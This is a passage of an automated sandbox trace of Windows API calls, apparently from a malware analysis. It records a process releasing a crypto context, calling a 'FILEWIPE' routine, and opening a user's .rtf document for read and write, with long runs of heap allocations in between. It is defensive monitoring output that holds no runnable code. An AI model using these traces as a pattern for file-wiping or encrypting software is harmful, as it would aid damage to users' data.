lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.186] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.187] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.187] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0172.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.187] FreeLibrary (hLibModule=0x74f20000) returned 1 [0172.190] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0172.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xfda093c0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 0x90af58 [0172.191] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.191] CharLowerBuffW (in: lpsz="byte[73759]", cchLength=0xb | out: lpsz="byte[73759]") returned 0xb [0172.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.193] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0172.193] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0172.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.193] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27f8 [0172.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.194] FreeLibrary (hLibModule=0x75c90000) returned 1 [0172.194] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0172.194] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.195] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0172.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0172.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\hqhniizhaa.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0172.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa71030 | out: hHeap=0x8a0000) returned 1 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.198] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0172.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0172.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0172.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: 